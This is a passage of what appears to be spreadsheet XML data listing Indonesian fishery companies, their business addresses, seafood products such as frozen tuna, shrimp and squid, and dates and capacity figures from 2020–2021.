    <m/>
    <m/>
  </r>
  <r>
    <n v="17301"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Mussel Segar, Scallop Segar, Tiram Segar"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17306"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Mussel Beku, Scallop Beku, Tiram Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="15000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17307"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17308"/>
    <x v="377"/>
    <s v="PT. SARANA INDOGUNA LESTARI"/>
    <s v="Kawasan Industri Millenium Jl. Millenium 22 Blok R5 No.3 Room C1, Kel. Kaduagung, Kec. Tigaraksa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17311"/>
    <x v="242"/>
    <s v="PT. VESSEL FRESHFISH INDOMAKMUR"/>
    <s v="Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5 , Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-10T00:00:00"/>
    <n v="350000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17328"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kepiting Lunak Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17332"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Kepiting Isi Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17354"/>
    <x v="459"/>
    <s v="PT. AGRO WESTINDO ABADI"/>
    <s v="Jl. Kavling DPR No.181 RT 003 RW 004, Kel. Serua, Kec. Bojongsari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-11-18T00:00:00"/>
    <n v="10000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17374"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17413"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tongkol Giling Beku"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17415"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17420"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17423"/>
    <x v="195"/>
    <s v="PT. YAKIN PASIFIK TUNA"/>
    <s v="Komplek Pelabuhan Perikanan Samudera Lampulo, Jl. Sisingamangaraja Ujung, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17424"/>
    <x v="505"/>
    <s v="PT. EKACITTA DIAN PERSADA"/>
    <s v="Komplek Pergudangan Greenland Cluster Batavia Blok AG No.11 Kota Deltamas, Kel. Sukamahi, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Kolagen Ikan "/>
    <d v="2020-03-06T00:00:00"/>
    <n v="3000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17446"/>
    <x v="460"/>
    <s v="TUNAS BARU"/>
    <s v="Lrg. Rimba Sakti RT 20, Desa Pudak, Kec. Kumpeh Ulu, Kabupaten Muaro Jambi&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Abon Patin"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="3300"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17451"/>
    <x v="331"/>
    <s v="PT. OCEAN MEGA PERSADA"/>
    <s v="Ruko Klampis Square C-28, Kel. Klampis Ngasem, Kec. Sukolilo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="120000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17459"/>
    <x v="28"/>
    <s v="PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Hiu Beku"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17460"/>
    <x v="28"/>
    <s v="PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Bandeng Beku"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17461"/>
    <x v="28"/>
    <s v="PT, INDUSTRI PERIKANAN TERPADU CHIU SHIH"/>
    <s v="Jl, Ikan Tuna Barat Raya II, Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17465"/>
    <x v="506"/>
    <s v="UD, PIALA I"/>
    <s v="Jl, Cakalang, Kompleks Pelabuhan Perikanan Pantai Sorong, Kel, Kampung Baru, Kec, Sorong Kota, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Ikan Pelagis Beku (Tenggiri, Kembung, Layang)"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="90000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17473"/>
    <x v="507"/>
    <s v="UD, MENARA MAS"/>
    <s v="Jl, Sukamara No,48 RT 01 RW 02 , Kel, Landasan Ulin Utara, Kec, Liang Anggang, Kota Banjar Baru&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Labi-Labi Hidup, Kura-kura Hidup"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17507"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-01-20T00:00:00"/>
    <n v="12000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17508"/>
    <x v="31"/>
    <s v="PT. PERMATA MARINDO JAYA"/>
    <s v="Kawasan Pelabuhan Perikanan Samudra Nizam Zachman, Jl. Hiu Raya Blok D Kav No.4, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Segar"/>
    <d v="2020-01-20T00:00:00"/>
    <n v="12000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17520"/>
    <x v="508"/>
    <s v="PT, INDAH JAYA BAHARI"/>
    <s v="Jl, Samudera No,1 Blok B Pelabuhan Perikanan Samudera Kendari, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Udang Beku"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="60000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17521"/>
    <x v="508"/>
    <s v="PT, INDAH JAYA BAHARI"/>
    <s v="Jl, Samudera No,1 Blok B Pelabuhan Perikanan Samudera Kendari, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Lemadang, Layaran, Layang, Cakalang)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="30000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17522"/>
    <x v="508"/>
    <s v="PT, INDAH JAYA BAHARI"/>
    <s v="Jl, Samudera No,1 Blok B Pelabuhan Perikanan Samudera Kendari, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Demersal Beku (Lencam, Biji Nangka, Kerapu, Layur, Kakatua, Kakap, Kaci-kaci)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="30000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17524"/>
    <x v="508"/>
    <s v="PT, INDAH JAYA BAHARI"/>
    <s v="Jl, Samudera No,1 Blok B Pelabuhan Perikanan Samudera Kendari, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17668"/>
    <x v="489"/>
    <s v="PT. GOLDEN CUP SEAFOOD"/>
    <s v="Jl. Gabion Perikanan No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-01-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17669"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Rajungan Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17670"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Hiu Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17671"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17672"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17673"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17676"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17678"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17679"/>
    <x v="10"/>
    <s v="CV. ALAM LAUT"/>
    <s v="Pergudangan Bandara Mas Blok M No.20, Kel. Selapajang Jaya, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-21T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17710"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17716"/>
    <x v="227"/>
    <s v="CV. ANUGERAH BAHARI FISHERY"/>
    <s v="Jl. Nambangan No.9 RT 006 RW 001, Kel. Tanah Kali Kedinding, Kec. Kenjeran, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="1000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17843"/>
    <x v="509"/>
    <s v="PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA"/>
    <s v="Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17844"/>
    <x v="509"/>
    <s v="PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA"/>
    <s v="Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17845"/>
    <x v="509"/>
    <s v="PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA"/>
    <s v="Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Segar (Bawal, Samge, Kakap, Kuro)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17846"/>
    <x v="509"/>
    <s v="PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA"/>
    <s v="Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Kakap, Samge, Kuro)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17847"/>
    <x v="509"/>
    <s v="PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA"/>
    <s v="Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Segar (Tongkol, Kembung, Cakalang, Tenggiri)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17848"/>
    <x v="509"/>
    <s v="PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA"/>
    <s v="Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Salem, Cakalang, Tenggiri)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17862"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Kering"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17863"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Kering"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17864"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Kering (Cumi-cumi)"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17890"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Tulang Sotong Kering"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17957"/>
    <x v="208"/>
    <s v="PT. PEDULI LAUT MALUKU"/>
    <s v="Jl. Raya Tulehu, Dusun Mamokeng, Kel. Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Segar (Meka)"/>
    <d v="2020-10-02T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18091"/>
    <x v="510"/>
    <s v="CV. SEMANGAT KAWAN SEJATI BARU"/>
    <s v="Jl. Gatot Subroto V No.6, Kel. Kaluku Bodoa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="8000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18189"/>
    <x v="177"/>
    <s v="PT. LONTARA JAYA SAKTI"/>
    <s v="Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="324"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18190"/>
    <x v="177"/>
    <s v="PT. LONTARA JAYA SAKTI"/>
    <s v="Jl. Pasar Ikan Beba, Kel. Tamasaju, Kec. Galesong Utara, Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="324"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18271"/>
    <x v="511"/>
    <s v="PT. INDO BAHARI LESTARI"/>
    <s v="Pergudangan Kosambi Megah Jl. Raya Perancis Blok A14, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Udang Ronggeng Hidup"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18272"/>
    <x v="511"/>
    <s v="PT. INDO BAHARI LESTARI"/>
    <s v="Pergudangan Kosambi Megah Jl. Raya Perancis Blok A14, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18273"/>
    <x v="511"/>
    <s v="PT. INDO BAHARI LESTARI"/>
    <s v="Pergudangan Kosambi Megah Jl. Raya Perancis Blok A14, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Lobster Hidup"/>
    <d v="2020-05-13T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18364"/>
    <x v="512"/>
    <s v="PT. BAHARI PRIMA MANUNGGAL"/>
    <s v="Jl. Bakti Mulya 2 No.58, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Segar"/>
    <d v="2020-01-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18365"/>
    <x v="512"/>
    <s v="PT. BAHARI PRIMA MANUNGGAL"/>
    <s v="Jl. Bakti Mulya 2 No.58, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kerang Beku"/>
    <d v="2020-01-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18366"/>
    <x v="512"/>
    <s v="PT. BAHARI PRIMA MANUNGGAL"/>
    <s v="Jl. Bakti Mulya 2 No.58, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Hasil Budidaya Segar (Nila, Patin, Lele, Gurame)"/>
    <d v="2020-01-06T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18367"/>
    <x v="512"/>
    <s v="PT. BAHARI PRIMA MANUNGGAL"/>
    <s v="Jl. Bakti Mulya 2 No.58, Kel. Tegal Alur, Kec. Kalideres, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Hasil Budidaya Beku (Nila, Patin, Lele, Gurame)"/>
    <d v="2020-01-06T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18370"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Kulit Lunak Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18377"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Kepiting Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18379"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18380"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Paha Kodok Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18381"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan) "/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18382"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
    <s v="Gudang Alat Perikanan Blok D No.3 Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Teripang Beku"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18390"/>
    <x v="513"/>
    <s v="PT. TIGAKA DISTRINDO PERKASA"/>
    <s v="Jl. Johar Blok F8/7 Delta Silicon 3 Lippo Cikarang, Kel. Cicau, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Minyak Krill"/>
    <d v="2021-02-16T00:00:00"/>
    <n v="500"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18456"/>
    <x v="514"/>
    <s v="CV. INDO JAYA PRATAMA"/>
    <s v="Dusun Krajan RT 005 RW 004, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="3265000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="18530"/>
    <x v="131"/>
    <s v="PT. BANDAR BAHARI SUKSES"/>
